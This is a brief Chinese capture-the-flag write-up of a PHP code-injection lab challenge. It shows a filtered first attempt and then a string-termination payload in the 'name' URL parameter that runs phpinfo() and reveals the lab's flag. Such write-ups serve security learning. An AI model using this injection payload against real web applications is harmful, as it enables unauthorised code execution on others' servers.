1.开启靶场
简介显示有PHPcode注入漏洞,简单绕过之后就可以执行PHPinfo(),拿到flag啦。
通过传入name参数的值就可以来进行代码注入了。
2.随便试一个值
http://192.168.0.20:32769/?name=PHPinfo()
果然没有那么简单,被过滤了。
3.查看源码
我不太懂PHP的代码,查阅了一下,可以通过截断的方式来进行绕过
";PHPinfo();"\ #通过;来把拼接的字符串截断就可以绕过了
http://192.168.0.20:32769/?name=%22;PHPinfo();%22\
拿到flag
flag{39a23b19e7df2581be80091b484687bc}
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。